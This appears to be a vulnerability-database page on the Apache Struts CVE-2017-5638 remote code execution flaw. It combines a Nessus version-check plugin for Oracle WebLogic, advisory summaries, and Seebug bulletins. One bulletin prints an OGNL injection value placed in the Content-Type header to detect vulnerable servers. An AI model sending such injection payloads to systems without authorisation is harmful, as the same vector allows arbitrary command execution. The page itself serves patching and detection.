      script_set_attribute(attribute:"exploit_available", value:"true");
      script_set_attribute(attribute:"exploit_framework_core", value:"true");
      script_set_attribute(attribute:"exploited_by_malware", value:"true");
      script_set_attribute(attribute:"metasploit_name", value:'Apache Struts Jakarta Multipart Parser OGNL Injection');
      script_set_attribute(attribute:"exploit_framework_metasploit", value:"true");
      script_set_attribute(attribute:"exploit_framework_canvas", value:"true");
      script_set_attribute(attribute:"canvas_package", value:'CANVAS');
      script_set_attribute(attribute:"in_the_news", value:"true");
    
      script_set_attribute(attribute:"vuln_publication_date", value:"2016/06/07");
      script_set_attribute(attribute:"patch_publication_date", value:"2017/04/18");
      script_set_attribute(attribute:"plugin_publication_date", value:"2017/04/21");
    
      script_set_attribute(attribute:"plugin_type", value:"local");
      script_set_attribute(attribute:"cpe", value:"cpe:/a:oracle:fusion_middleware");
      script_set_attribute(attribute:"cpe", value:"cpe:/a:oracle:weblogic_server");
      script_end_attributes();
    
      script_category(ACT_GATHER_INFO);
      script_family(english:"Misc.");
    
      script_copyright(english:"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.");
    
      script_dependencies("oracle_weblogic_server_installed.nbin");
      script_require_keys("installed_sw/Oracle WebLogic Server");
    
      exit(0);
    }
    
    include("audit.inc");
    include("global_settings.inc");
    include("misc_func.inc");
    include("install_func.inc");
    
    app_name = "Oracle WebLogic Server";
    
    install = get_single_install(app_name:app_name, exit_if_unknown_ver:TRUE);
    ohome = install["Oracle Home"];
    subdir = install["path"];
    version = install["version"];
    
    fix = NULL;
    fix_ver = NULL;
    
    # individual security patches
    if (version =~ "^10\.3\.6\.")
    {
      fix_ver = "10.3.6.0.170418";
      fix = "25388747";
    }
    else if (version =~ "^12\.1\.3\.")
    {
      fix_ver = "12.1.3.0.170418";
      fix = "25388793";
    }
    else if (version =~ "^12\.2\.1\.0($|[^0-9])")
    {
      fix_ver = "12.2.1.0.170418";
      fix = "25388847";
    }
    else if (version =~ "^12\.2\.1\.1($|[^0-9])")
    {
      fix_ver = "12.2.1.1.170418";
      fix = "25388843";
    }
    else if (version =~ "^12\.2\.1\.2($|[^0-9])")
    {
      fix_ver = "12.2.1.2.170418";
      fix = "25388866";
    }
    
    if (!isnull(fix_ver) && ver_compare(ver:version, fix:fix_ver, strict:FALSE) == -1)
    {
      port = 0;
      report =
        '\n  Oracle home    : ' + ohome +
        '\n  Install path   : ' + subdir +
        '\n  Version        : ' + version +
        '\n  Required patch : ' + fix +
        '\n';
      security_report_v4(extra:report, port:port, severity:SECURITY_HOLE);
    }
    else audit(AUDIT_INST_PATH_NOT_VULN, app_name, version, subdir);
    
  • NASL familyMisc.
    NASL idORACLE_WEBLOGIC_SERVER_CPU_JUL_2017.NASL
    descriptionThe version of Oracle WebLogic Server installed on the remote host is affected by multiple vulnerabilities : - A flaw exists in Jython due to executable classes being created with insecure permissions. A local attacker can exploit this to bypass intended access restrictions and thereby disclose sensitive information or gain elevated privileges. (CVE-2013-2027) - A remote code execution vulnerability exists in the Apache Struts component in the Jakarta Multipart parser due to improper handling of the Content-Type, Content-Disposition, and Content-Length headers. An unauthenticated, remote attacker can exploit this, via a specially crafted header value in the HTTP request, to execute arbitrary code. (CVE-2017-5638) - An unspecified flaw exists in the Web Services component that allows an unauthenticated, remote attacker to have an impact on integrity and availability. (CVE-2017-10063) - An unspecified flaw exists in the Web Container component that allows an authenticated, remote attacker to disclose sensitive information. (CVE-2017-10123) - An unspecified flaw exists in the JNDI component that allows an unauthenticated, remote attacker to execute arbitrary code. (CVE-2017-10137) - An unspecified flaw exists in the Core Components that allows an unauthenticated, remote attacker to cause a denial of service condition. (CVE-2017-10147) - An unspecified flaw exists in the Core Components that allows an unauthenticated, remote attacker to have an impact on integrity. (CVE-2017-10148) - An unspecified flaw exists in the Web Container component that allows an unauthenticated, remote attacker to have an impact on confidentiality and integrity. (CVE-2017-10178)
    last seen2020-06-01
    modified2020-06-02
    plugin id101815
    published2017-07-19
    reporterThis script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/101815
    titleOracle WebLogic Server Multiple Vulnerabilities (July 2017 CPU)
  • NASL familyCGI abuses
    NASL idMYSQL_ENTERPRISE_MONITOR_3_3_3_1199.NASL
    descriptionAccording to its self-reported version, the MySQL Enterprise Monitor application running on the remote host is 3.1.x prior to 3.1.7.8023, 3.2.x prior to 3.2.7.1204, or 3.3.x prior to 3.3.3.1199. It is, therefore, affected by multiple vulnerabilities : - A denial of service vulnerability exists in the Apache Commons component in the FileUpload functionality due to improper handling of file upload requests. An unauthenticated, remote attacker can exploit this, via a specially crafted content-type header, to cause a denial of service condition. Note that this vulnerability does not affect MySQL Enterprise Monitor versions 3.3.x. (CVE-2016-3092) - An unspecified flaw exists in the Apache Struts component that is triggered during the cleanup of action names. An unauthenticated, remote attacker can exploit this, via a specially crafted payload, to perform unspecified actions. (CVE-2016-4436) - A carry propagation error exists in the OpenSSL component in the Broadwell-specific Montgomery multiplication procedure when handling input lengths divisible by but longer than 256 bits. This can result in transient authentication and key negotiation failures or reproducible erroneous outcomes of public-key operations with specially crafted input. A man-in-the-middle attacker can possibly exploit this issue to compromise ECDH key negotiations that utilize Brainpool P-512 curves. (CVE-2016-7055) - An unspecified flaw exists in the Monitoring Server subcomponent that allows an authenticated, remote attacker to impact confidentiality and integrity. (CVE-2017-3306) - An unspecified flaw exists in the Monitoring Server subcomponent that allows an authenticated, remote attacker to impact integrity and availability. (CVE-2017-3307) - An out-of-bounds read error exists in the OpenSSL component when handling packets using the CHACHA20/POLY1305 or RC4-MD5 ciphers. An unauthenticated, remote attacker can exploit this, via specially crafted truncated packets, to cause a denial of service condition. (CVE-2017-3731) - A carry propagating error exists in the OpenSSL component in the x86_64 Montgomery squaring implementation that may cause the BN_mod_exp() function to produce incorrect results. An unauthenticated, remote attacker with sufficient resources can exploit this to obtain sensitive information regarding private keys. (CVE-2017-3732) - A remote code execution vulnerability exists in the Apache Struts component in the Jakarta Multipart parser due to improper handling of the Content-Type, Content-Disposition, and Content-Length headers. An unauthenticated, remote attacker can exploit this, via a specially crafted header value in the HTTP request, to execute arbitrary code. (CVE-2017-5638)
    last seen2020-06-01
    modified2020-06-02
    plugin id99593
    published2017-04-21
    reporterThis script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/99593
    titleMySQL Enterprise Monitor 3.1.x < 3.1.7.8023 / 3.2.x < 3.2.7.1204 / 3.3.x < 3.3.3.1199 Multiple Vulnerabilities (April 2017 CPU)

Packetstorm

Saint

bid96729
descriptionApache Struts 2 Jakarta Multipart Parser file upload command execution
idweb_dev_struts2jakartarce
titleapache_struts2_jakarta_file_upload_command_execution
typeremote

Seebug

  • bulletinFamilyexploit
    descriptionIt is possible to perform a RCE attack with a malicious Content-Disposition value or with improper Content-Length header. If the Content-Dispostion / Content-Length value is not valid an exception is thrown which is then used to display an error message to a user. This is a different vector for the same vulnerability described in [S2-045](https://cwiki.apache.org/confluence/display/WW/S2-045) (CVE-2017-5638).
    idSSV:92804
    last seen2017-11-19
    modified2017-03-21
    published2017-03-21
    reporterRoot
    titleS2-046: Struts 2 Remote Code Execution vulnerability(CVE-2017-5638)
  • bulletinFamilyexploit
    descriptionBased on the Jakarta plugin plugin Struts remote code execution vulnerability, a malicious user can upload a file by modifying the HTTP request header Content-Type value to trigger the vulnerability, and then execute the system command. Sound detection method(the detection method by the constant company): the In to the server to issue the http request packet, modify the Content-Type field: `Content-Type:%{#context['com. opensymphony. xwork2. dispatcher. HttpServletResponse']. addHeader('vul','vul')}. multipart/form-data` Such as the return response packets in the presence of vul: the vul field entry then indicates the presence of vulnerability.
    idSSV:92746
    last seen2017-11-19
    modified2017-03-06
    published2017-03-06
    reporterRoot
    titleS2-045: Struts 2 Remote Code Execution vulnerability(CVE-2017-5638)

The Hacker News

References